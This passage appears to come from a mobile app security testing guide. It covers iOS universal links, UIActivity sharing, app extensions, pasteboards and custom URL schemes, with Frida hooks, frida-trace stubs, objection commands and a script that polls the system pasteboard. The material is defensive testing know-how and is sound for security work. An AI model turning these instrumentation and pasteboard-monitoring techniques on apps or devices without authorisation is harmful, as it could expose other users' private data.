First we let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n
You can see that only one function was found and is being instrumented. Trigger now the universal link and observe the traces.
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n
You can observe that the function is in fact being called. You can now add code to the stubs in __handlers__/
to obtain more details:
// __handlers__/__AppDelegate_application_contin_8e36bbb1.js\n\n onEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] + \" continueUserActivity: \" + args[3] +\n \" restorationHandler: \" + args[4] + \"]\");\n log(\"\\tapplication: \" + ObjC.Object(args[2]).toString());\n log(\"\\tcontinueUserActivity: \" + ObjC.Object(args[3]).toString());\n log(\"\\t\\twebpageURL: \" + ObjC.Object(args[3]).webpageURL().toString());\n log(\"\\t\\tactivityType: \" + ObjC.Object(args[3]).activityType().toString());\n log(\"\\t\\tuserInfo: \" + ObjC.Object(args[3]).userInfo().toString());\n log(\"\\trestorationHandler: \" +ObjC.Object(args[4]).toString());\n },\n
The new output is:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
Apart from the function parameters we have added more information by calling some methods from them to get more details, in this case about the NSUserActivity
. If we look in the Apple Developer Documentation we can see what else we can call from this object.
If you want to know more about which function actually opens the URL and how the data is actually being handled you should keep investigating.
Extend the previous command in order to find out if there are any other functions involved in opening the URL.
frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n
-i
includes any method. You can also use a glob pattern here (e.g. -i \"*open*Url*\"
means \"include any function containing 'open', then 'Url' and something else\")
Again, we first let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n$S10TelegramUI0A19ApplicationBindingsC16openUniversalUrlyySS_AA0ac4OpenG10Completion...\n$S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData18application...\n$S10TelegramUI31AuthorizationSequenceControllerC7account7strings7openUrl5apiId0J4HashAC0A4Core19...\n...\n
Now you can see a long list of functions but we still don't know which ones will be called. Trigger the universal link again and observe the traces.
/* TID 0x303 */\n298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298619 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA\n 14OpenURLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display0\n 10NavigationO0CSgyyctF()\n
Apart from the Objective-C method, now there is one Swift function that is also of your interest.
There is probably no documentation for that Swift function but you can just demangle its symbol using swift-demangle
via xcrun
:
xcrun can be used to invoke Xcode developer tools from the command-line, without having them in the path. In this case it will locate and run swift-demangle, an Xcode tool that demangles Swift symbols.
$ xcrun swift-demangle S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14OpenURLContextOSSSbAA0\n12PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF\n
Resulting in:
---> TelegramUI.openExternalUrl(\n account: TelegramCore.Account, context: TelegramUI.OpenURLContext, url: Swift.String,\n forceExternal: Swift.Bool, presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\n
This not only gives you the class (or module) of the method, its name and the parameters but also reveals the parameter types and return type, so in case you need to dive deeper now you know where to start.
For now we will use this information to properly print the parameters by editing the stub file:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\n onEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account: TelegramCore.Account,\n context: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\n presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\");\n log(\"\\taccount: \" + ObjC.Object(args[0]).toString());\n log(\"\\tcontext: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n },\n
This way, the next time we run it we get a much more detailed output:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n\n298619 ms | TelegramUI.openExternalUrl(account: TelegramCore.Account,\ncontext: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\npresentationData: TelegramUI.PresentationData, applicationContext:\nTelegramUI.TelegramApplicationContext, navigationController: Display.NavigationController?,\ndismissInput: () -> ()) -> ()\n298619 ms | account: TelegramCore.Account\n298619 ms | context: nil\n298619 ms | url: http://t.me/addstickers/radare\n298619 ms | presentationData: 0x1c4e40fd1\n298619 ms | applicationContext: nil\n298619 ms | navigationController: TelegramUI.PresentationData\n
There you can observe the following:
application:continueUserActivity:restorationHandler:
from the app delegate as expected.application:continueUserActivity:restorationHandler:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.https://t.me/addstickers/radare
You can now keep going and try to trace and verify how the data is being validated. For example, if you have two apps that communicate via universal links you can use this to see if the sending app is leaking sensitive data by hooking these methods in the receiving app. This is especially useful when you don't have the source code as you will be able to retrieve the full URL that you wouldn't see otherwise as it might be the result of clicking some button or triggering some functionality.
In some cases, you might find data in userInfo
of the NSUserActivity
object. In the previous case there was no data being transferred but it might be the case for other scenarios. To see this, be sure to hook the userInfo
property or access it directly from the continueUserActivity
object in your hook (e.g. by adding a line like this log(\"userInfo:\" + ObjC.Object(args[3]).userInfo().toString());
).
Universal links and Apple's Handoff feature are related:
application:continueUserActivity:restorationHandler:\n
com.apple.developer.associated-domains
entitlement and in the server's apple-app-site-association
file (in both cases via the keyword \"activitycontinuation\":
). See \"Retrieving the Apple App Site Association File\" above for an example.Actually, the previous example in \"Checking How the Links Are Opened\" is very similar to the \"Web Browser-to-Native App Handoff\" scenario described in the \"Handoff Programming Guide\":
If the user is using a web browser on the originating device, and the receiving device is an iOS device with a native app that claims the domain portion of the webpageURL
property, then iOS launches the native app and sends it an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The webpageURL
property contains the URL the user was visiting, while the userInfo
dictionary is empty.
In the detailed output above you can see that NSUserActivity
object we've received meets exactly the mentioned points:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
This knowledge should help you when testing apps supporting Handoff.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/","title":"Testing UIActivity Sharing","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#sending-items","title":"Sending Items","text":"When testing UIActivity
Sharing you should pay special attention to:
Data sharing via UIActivity
works by creating a UIActivityViewController
and passing it the desired items (URLs, text, a picture) on init(activityItems: applicationActivities:)
.
As we mentioned before, it is possible to exclude some of the sharing mechanisms via the controller's excludedActivityTypes
property. It is highly recommended to do the tests using the latest versions of iOS as the number of activity types that can be excluded can increase. The developers have to be aware of this and explicitly exclude the ones that are not appropriate for the app data. Some activity types might not even be documented, like \"Create Watch Face\".
If you have the source code, you should take a look at the UIActivityViewController
:
init(activityItems:applicationActivities:)
method.excludedActivityTypes
, if any.If you only have the compiled/installed app, try searching for the previous method and property, for example:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep -i activityItems\n0x1000df034 45 44 initWithActivityItems:applicationActivities:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items","title":"Receiving Items","text":"When receiving items, you should check:
application:openURL:options:
(or its deprecated version UIApplicationDelegate application:openURL:sourceApplication:annotation:
) in the app delegate.If not having the source code you can still take a look into the Info.plist
file and search for:
UTExportedTypeDeclarations
/UTImportedTypeDeclarations
if the app declares exported/imported custom document types.CFBundleDocumentTypes
to see if the app specifies any document types that it can open.A very complete explanation about the use of these keys can be found on Stackoverflow.
Let's see a real-world example. We will take a File Manager app and take a look at these keys. We used objection here to read the Info.plist
file.
objection --gadget SomeFileManager run ios plist cat Info.plist\n
Note that this is the same as if we were to retrieve the IPA from the phone or access it via e.g. SSH and navigate to the corresponding folder in the IPA / app sandbox. However, with objection we are just one command away from our goal and this can be still considered static analysis.
The first thing we noticed is that the app does not declare any imported custom document types but we could find a couple of exported ones:
UTExportedTypeDeclarations = (\n {\n UTTypeConformsTo = (\n \"public.data\"\n );\n UTTypeDescription = \"SomeFileManager Files\";\n UTTypeIdentifier = \"com.some.filemanager.custom\";\n UTTypeTagSpecification = {\n \"public.filename-extension\" = (\n ipa,\n deb,\n zip,\n rar,\n tar,\n gz,\n ...\n key,\n pem,\n p12,\n cer\n );\n };\n }\n);\n
The app also declares the document types it opens as we can find the key CFBundleDocumentTypes
:
CFBundleDocumentTypes = (\n {\n ...\n CFBundleTypeName = \"SomeFileManager Files\";\n LSItemContentTypes = (\n \"public.content\",\n \"public.data\",\n \"public.archive\",\n \"public.item\",\n \"public.database\",\n \"public.calendar-event\",\n ...\n );\n }\n);\n
We can see that this File Manager will try to open anything that conforms to any of the UTIs listed in LSItemContentTypes
and it's ready to open files with the extensions listed in UTTypeTagSpecification/\"public.filename-extension\"
. Please take a note of this because it will be useful if you want to search for vulnerabilities when dealing with the different types of files when performing dynamic analysis.
There are three main things you can easily inspect by performing dynamic instrumentation:
activityItems
: an array of the items being shared. They might be of different types, e.g. one string and one picture to be shared via a messaging app.applicationActivities
: an array of UIActivity
objects representing the app's custom services.excludedActivityTypes
: an array of the Activity Types that are not supported, e.g. postToFacebook
.To achieve this you can do two things:
init(activityItems: applicationActivities:)
) to get the activityItems
and applicationActivities
.excludedActivityTypes
property.Let's see an example using Telegram to share a picture and a text file. First prepare the hooks, we will use the Frida REPL and write a script for this:
Interceptor.attach(\nObjC.classes.\n UIActivityViewController['- initWithActivityItems:applicationActivities:'].implementation, {\n onEnter: function (args) {\n\n printHeader(args)\n\n this.initWithActivityItems = ObjC.Object(args[2]);\n this.applicationActivities = ObjC.Object(args[3]);\n\n console.log(\"initWithActivityItems: \" + this.initWithActivityItems);\n console.log(\"applicationActivities: \" + this.applicationActivities);\n\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nInterceptor.attach(\nObjC.classes.UIActivityViewController['- excludedActivityTypes'].implementation, {\n onEnter: function (args) {\n printHeader(args)\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nfunction printHeader(args) {\n console.log(Memory.readUtf8String(args[1]) + \" @ \" + args[1])\n};\n\nfunction printRet(retval) {\n console.log('RET @ ' + retval + ': ' );\n try {\n console.log(new ObjC.Object(retval).toString());\n } catch (e) {\n console.log(retval.toString());\n }\n};\n
You can store this as a JavaScript file, e.g. inspect_send_activity_data.js
and load it like this:
frida -U Telegram -l inspect_send_activity_data.js\n
Now observe the output when you first share a picture:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<UIImage: 0x1c4aa0b40> size {571, 264} orientation 0 scale 1.000000\"\n)\napplicationActivities: nil\nRET @ 0x13cb2b800:\n<UIActivityViewController: 0x13cb2b800>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x0:\nnil\n
and then a text file:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<QLActivityItemProvider: 0x1c4a30140>\",\n \"<UIPrintInfo: 0x1c0699a50>\"\n)\napplicationActivities: (\n)\nRET @ 0x13c4bdc00:\n<_UIDICActivityViewController: 0x13c4bdc00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x1c001b1d0:\n(\n \"com.apple.UIKit.activity.MarkupAsPDF\"\n)\n
You can see that:
UIImage
and there are no excluded activities.com.apple.UIKit.activity.MarkupAsPDF
is excluded.In the previous example, there were no custom applicationActivities
and only one excluded activity. However, to better illustrate what you can expect from other apps we have shared a picture using another app, here you can see a bunch of application activities and excluded activities (output was edited to hide the name of the originating app):
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<SomeActivityItemProvider: 0x1c04bd580>\"\n)\napplicationActivities: (\n \"<SomeActionItemActivityAdapter: 0x141de83b0>\",\n \"<SomeActionItemActivityAdapter: 0x147971cf0>\",\n \"<SomeOpenInSafariActivity: 0x1479f0030>\",\n \"<SomeOpenInChromeActivity: 0x1c0c8a500>\"\n)\nRET @ 0x142138a00:\n<SomeActivityViewController: 0x142138a00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x14797c3e0:\n(\n \"com.apple.UIKit.activity.Print\",\n \"com.apple.UIKit.activity.AssignToContact\",\n \"com.apple.UIKit.activity.SaveToCameraRoll\",\n \"com.apple.UIKit.activity.CopyToPasteboard\",\n)\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items_1","title":"Receiving Items","text":"After performing the static analysis you would know the document types that the app can open and if it declares any custom document types and (part of) the methods involved. You can use this now to test the receiving part:
application:openURL:options:
and any other methods that were identified in a previous static analysis.To illustrate this with an example we have chosen the same real-world file manager app from the static analysis section and followed these steps:
As there is no default app that will open the file, it switches to the Open with... popup. There, we can select the app that will open our file. The next screenshot shows this (we have modified the display name using Frida to conceal the app's real name):
After selecting SomeFileManager we can see the following:
(0x1c4077000) -[AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101c00950>\nopenURL: file:///var/mobile/Library/Application%20Support\n /Containers/com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\noptions: {\n UIApplicationOpenURLOptionsAnnotationKey = {\n LSMoveDocumentOnOpen = 1;\n };\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.sharingd\";\n \"_UIApplicationOpenURLOptionsSourceProcessHandleKey\" = \"<FBSProcessHandle: 0x1c3a63140;\n sharingd:605; valid: YES>\";\n}\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cdc34 FrontBoardServices!-[FBSSerialQueue _performNextFromRunLoopSource]\nRET: 0x1\n
As you can see, the sending application is com.apple.sharingd
and the URL's scheme is file://
. Note that once we select the app that should open the file, the system already moved the file to the corresponding destination, that is to the app's Inbox. The apps are then responsible for deleting the files inside their Inboxes. This app, for example, moves the file to /var/mobile/Documents/
and removes it from the Inbox.
(0x1c002c760) -[XXFileManager moveItemAtPath:toPath:error:]\nmoveItemAtPath: /var/mobile/Library/Application Support/Containers\n /com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\ntoPath: /var/mobile/Documents/OWASP_MASVS (1).pdf\nerror: 0x16f095bf8\n0x100f24e90 SomeFileManager!-[AppDelegate __handleOpenURL:]\n0x100f25198 SomeFileManager!-[AppDelegate application:openURL:options:]\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cd9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\nRET: 0x1\n
If you look at the stack trace, you can see how application:openURL:options:
called __handleOpenURL:
, which called moveItemAtPath:toPath:error:
. Notice that we have now this information without having the source code for the target app. The first thing that we had to do was clear: hook application:openURL:options:
. Regarding the rest, we had to think a little bit and come up with methods that we could start tracing and are related to the file manager, for example, all methods containing the strings \"copy\", \"move\", \"remove\", etc. until we have found that the one being called was moveItemAtPath:toPath:error:
.
A final thing worth noticing here is that this way of handling incoming files is the same for custom URL schemes. Please refer to the \"Testing Custom URL Schemes\" section for more information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/","title":"Testing App Extensions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#static-analysis","title":"Static Analysis","text":"The static analysis will take care of:
If you have the original source code you can search for all occurrences of NSExtensionPointIdentifier
with Xcode (cmd+shift+f) or take a look into \"Build Phases / Embed App extensions\":
There you can find the names of all embedded app extensions followed by .appex
, now you can navigate to the individual app extensions in the project.
If not having the original source code:
Grep for NSExtensionPointIdentifier
among all files inside the app bundle (IPA or installed app):
$ grep -nr NSExtensionPointIdentifier Payload/Telegram\\ X.app/\nBinary file Payload/Telegram X.app//PlugIns/SiriIntents.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Share.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/NotificationContent.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Widget.appex/Info.plist matches\nBinary file Payload/Telegram X.app//Watch/Watch.app/PlugIns/Watch Extension.appex/Info.plist matches\n
You can also access per SSH, find the app bundle and list all inside PlugIns (they are placed there by default) or do it with objection:
ph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # cd PlugIns\n /var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/\n Telegram X.app/PlugIns\n\nph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Name\n------------ ------- ------------------ ------ ------- -------------------------\nDirectory 493 None True False NotificationContent.appex\nDirectory 493 None True False Widget.appex\nDirectory 493 None True False Share.appex\nDirectory 493 None True False SiriIntents.appex\n
We can see now the same four app extensions that we saw in Xcode before.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#determining-the-supported-data-types","title":"Determining the Supported Data Types","text":"This is important for data being shared with host apps (e.g. via Share or Action Extensions). When the user selects some data type in a host app and it matches the data types defined here, the host app will offer the extension. It is worth noticing the difference between this and data sharing via UIActivity
where we had to define the document types, also using UTIs. An app does not need to have an extension for that. It is possible to share data using only UIActivity
.
Inspect the app extension's Info.plist
file and search for NSExtensionActivationRule
. That key specifies the data being supported as well as e.g. maximum of items supported. For example:
<key>NSExtensionAttributes</key>\n <dict>\n <key>NSExtensionActivationRule</key>\n <dict>\n <key>NSExtensionActivationSupportsImageWithMaxCount</key>\n <integer>10</integer>\n <key>NSExtensionActivationSupportsMovieWithMaxCount</key>\n <integer>1</integer>\n <key>NSExtensionActivationSupportsWebURLWithMaxCount</key>\n <integer>1</integer>\n </dict>\n </dict>\n
Only the data types present here and not having 0
as MaxCount
will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the Apple App Extension Programming Guide for more detailed information about this.
Remember that app extensions and their containing apps do not have direct access to each other\u2019s containers. However, data sharing can be enabled. This is done via \"App Groups\" and the NSUserDefaults
API. See this figure from Apple App Extension Programming Guide:
As also mentioned in the guide, the app must set up a shared container if the app extension uses the NSURLSession
class to perform a background upload or download, so that both the extension and its containing app can access the transferred data.
It is possible to reject a specific type of app extension by using the following method:
application:shouldAllowExtensionPointIdentifier:
However, it is currently only possible for \"custom keyboard\" app extensions (and should be verified when testing apps handling sensitive data via the keyboard like e.g. banking apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#dynamic-analysis","title":"Dynamic Analysis","text":"For the dynamic analysis we can do the following to gain knowledge without having the source code:
For this we should hook NSExtensionContext - inputItems
in the data originating app.
Following the previous example of Telegram we will now use the \"Share\" button on a text file (that was received from a chat) to create a note in the Notes app with it:
If we run a trace, we'd see the following output:
(0x1c06bb420) NSExtensionContext - inputItems\n0x18284355c Foundation!-[NSExtension _itemProviderForPayload:extensionContext:]\n0x1828447a4 Foundation!-[NSExtension _loadItemForPayload:contextIdentifier:completionHandler:]\n0x182973224 Foundation!__NSXPCCONNECTION_IS_CALLING_OUT_TO_EXPORTED_OBJECT_S3__\n0x182971968 Foundation!-[NSXPCConnection _decodeAndInvokeMessageWithEvent:flags:]\n0x182748830 Foundation!message_handler\n0x181ac27d0 libxpc.dylib!_xpc_connection_call_event_handler\n0x181ac0168 libxpc.dylib!_xpc_connection_mach_event\n...\nRET: (\n\"<NSExtensionItem: 0x1c420a540> - userInfo:\n{\n NSExtensionItemAttachmentsKey = (\n \"<NSItemProvider: 0x1c46b30e0> {types = (\\n \\\"public.plain-text\\\",\\n \\\"public.file-url\\\"\\n)}\"\n );\n}\"\n)\n
Here we can observe that:
NSXPCConnection
that uses the libxpc.dylib
Framework.NSItemProvider
are public.plain-text
and public.file-url
, the latter being included in NSExtensionActivationRule
from the Info.plist
of the \"Share Extension\" of Telegram.You can also find out which app extension is taking care of the requests and responses by hooking NSExtension - _plugIn
:
We run the same example again:
(0x1c0370200) NSExtension - _plugIn\nRET: <PKPlugin: 0x1163637f0 ph.telegra.Telegraph.Share(5.3) 5B6DE177-F09B-47DA-90CD-34D73121C785\n1(2) /private/var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35\n/Telegram X.app/PlugIns/Share.appex>\n\n(0x1c0372300) -[NSExtension _plugIn]\nRET: <PKPlugin: 0x10bff7910 com.apple.mobilenotes.SharingExtension(1.5) 73E4F137-5184-4459-A70A-83\nF90A1414DC 1(2) /private/var/containers/Bundle/Application/5E267B56-F104-41D0-835B-F1DAB9AE076D\n/MobileNotes.app/PlugIns/com.apple.mobilenotes.SharingExtension.appex>\n
As you can see there are two app extensions involved:
Share.appex
is sending the text file (public.plain-text
and public.file-url
).com.apple.mobilenotes.SharingExtension.appex
which is receiving and will process the text file.If you want to learn more about what's happening under the hood in terms of XPC, we recommend taking a look at the internal calls from \"libxpc.dylib\". For example you can use frida-trace
and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs.
The systemwide general pasteboard can be obtained by using generalPasteboard
, search the source code or the compiled binary for this method. Using the systemwide general pasteboard should be avoided when dealing with sensitive data.
Custom pasteboards can be created with pasteboardWithName:create:
or pasteboardWithUniqueName
. Verify if custom pasteboards are set to be persistent as this is deprecated since iOS 10. A shared container should be used instead.
In addition, the following can be inspected:
removePasteboardWithName:
, which invalidates an app pasteboard, freeing up all resources used by it (no effect for the general pasteboard).setItems:options:
with the UIPasteboardOptionLocalOnly
option.setItems:options:
with the UIPasteboardOptionExpirationDate
option.Hook or trace the following:
generalPasteboard
for the system-wide general pasteboard.pasteboardWithName:create:
and pasteboardWithUniqueName
for custom pasteboards.Hook or trace the deprecated setPersistent:
method and verify if it's being called.
When monitoring the pasteboards, there are several details that may be dynamically retrieved:
pasteboardWithName:create:
and inspecting its input parameters or pasteboardWithUniqueName
and inspecting its return value.string
method. Or use any of the other methods for the standard data types.numberOfItems
.hasImages
, hasStrings
, hasURLs
(starting in iOS 10).containsPasteboardTypes: inItemSet:
. You may inspect for more concrete data types like, for example a picture as public.png and public.tiff (UTIs) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that declare knowledge of the type are able to understand the data written to the pasteboard. This is the same as we have seen in the \"UIActivity Sharing\" section. Retrieve them using itemSetWithPasteboardTypes:
and setting the corresponding UTIs.setItems:options:
and inspecting its options for UIPasteboardOptionLocalOnly
or UIPasteboardOptionExpirationDate
.If only looking for strings you may want to use objection's command ios pasteboard monitor
:
Hooks into the iOS UIPasteboard class and polls the generalPasteboard every 5 seconds for data. If new data is found, different from the previous poll, that data will be dumped to screen.
You may also build your own pasteboard monitor that monitors specific information as seen above.
For example, this script (inspired from the script behind objection's pasteboard monitor) reads the pasteboard items every 5 seconds, if there's something new it will print it:
const UIPasteboard = ObjC.classes.UIPasteboard;\n const Pasteboard = UIPasteboard.generalPasteboard();\n var items = \"\";\n var count = Pasteboard.changeCount().toString();\n\nsetInterval(function () {\n const currentCount = Pasteboard.changeCount().toString();\n const currentItems = Pasteboard.items().toString();\n\n if (currentCount === count) { return; }\n\n items = currentItems;\n count = currentCount;\n\n console.log('[* Pasteboard changed] count: ' + count +\n ' hasStrings: ' + Pasteboard.hasStrings().toString() +\n ' hasURLs: ' + Pasteboard.hasURLs().toString() +\n ' hasImages: ' + Pasteboard.hasImages().toString());\n console.log(items);\n\n }, 1000 * 5);\n
In the output we can see the following:
[* Pasteboard changed] count: 64 hasStrings: true hasURLs: false hasImages: false\n(\n {\n \"public.utf8-plain-text\" = hola;\n }\n)\n[* Pasteboard changed] count: 65 hasStrings: true hasURLs: true hasImages: false\n(\n {\n \"public.url\" = \"https://codeshare.frida.re/\";\n \"public.utf8-plain-text\" = \"https://codeshare.frida.re/\";\n }\n)\n[* Pasteboard changed] count: 66 hasStrings: false hasURLs: false hasImages: true\n(\n {\n \"com.apple.uikit.image\" = \"<UIImage: 0x1c42b23c0> size {571, 264} orientation 0 scale 1.000000\";\n \"public.jpeg\" = \"<UIImage: 0x1c44a1260> size {571, 264} orientation 0 scale 1.000000\";\n \"public.png\" = \"<UIImage: 0x1c04aaaa0> size {571, 264} orientation 0 scale 1.000000\";\n }\n)\n
You see that first a text was copied including the string \"hola\", after that a URL was copied and finally a picture was copied. Some of them are available via different UTIs. Other apps will consider these UTIs to allow pasting of this data or not.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/","title":"Testing Custom URL Schemes","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#static-analysis","title":"Static Analysis","text":"There are a couple of things that we can do using static analysis. In the next sections we will see the following:
The first step to test custom URL schemes is finding out whether an application registers any protocol handlers.
If you have the original source code and want to view registered protocol handlers, simply open the project in Xcode, go to the Info tab and open the URL Types section as presented in the screenshot below:
Also in Xcode you can find this by searching for the CFBundleURLTypes
key in the app\u2019s Info.plist
file (example from iGoat-Swift):
<key>CFBundleURLTypes</key>\n<array>\n <dict>\n <key>CFBundleURLName</key>\n <string>com.iGoat.myCompany</string>\n <key>CFBundleURLSchemes</key>\n <array>\n <string>iGoat</string>\n </array>\n </dict>\n</array>\n
In a compiled application (or IPA), registered protocol handlers are found in the file Info.plist
in the app bundle's root folder. Open it and search for the CFBundleURLSchemes
key, if present, it should contain an array of strings (example from iGoat-Swift):
grep -A 5 -nri urlsch Info.plist\nInfo.plist:45: <key>CFBundleURLSchemes</key>\nInfo.plist-46- <array>\nInfo.plist-47- <string>iGoat</string>\nInfo.plist-48- </array>\n
Once the URL scheme is registered, other apps can open the app that registered the scheme, and pass parameters by creating appropriately formatted URLs and opening them with the UIApplication openURL:options:completionHandler:
method.
Note from the App Programming Guide for iOS:
If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme.
This could lead to a URL scheme hijacking attack (see page 136 in [#thiel2]).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-application-query-schemes-registration","title":"Testing Application Query Schemes Registration","text":"Before calling the openURL:options:completionHandler:
method, apps can call canOpenURL:
to verify that the target app is available. However, as this method was being used by malicious apps as a way to enumerate installed apps, from iOS 9.0 the URL schemes passed to it must also be declared by adding the LSApplicationQueriesSchemes
key to the app's Info.plist
file and an array of up to 50 URL schemes.
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>url_scheme1</string>\n <string>url_scheme2</string>\n </array>\n
canOpenURL
will always return NO
for undeclared schemes, whether or not an appropriate app is installed. However, this restriction only applies to canOpenURL
.
The openURL:options:completionHandler:
method will still open any URL scheme, even if the LSApplicationQueriesSchemes
array was declared, and return YES
/ NO
depending on the result.
As an example, Telegram declares in its Info.plist
these Queries Schemes, among others:
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>dbapi-3</string>\n <string>instagram</string>\n <string>googledrive</string>\n <string>comgooglemaps-x-callback</string>\n <string>foursquare</string>\n <string>here-location</string>\n <string>yandexmaps</string>\n <string>yandexnavi</string>\n <string>comgooglemaps</string>\n <string>youtube</string>\n <string>twitter</string>\n ...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-handling-and-validation","title":"Testing URL Handling and Validation","text":"In order to determine how a URL path is built and validated, if you have the original source code, you can search for the following methods:
application:didFinishLaunchingWithOptions:
method or application:will-FinishLaunchingWithOptions:
: verify how the decision is made and how the information about the URL is retrieved.application:openURL:options:
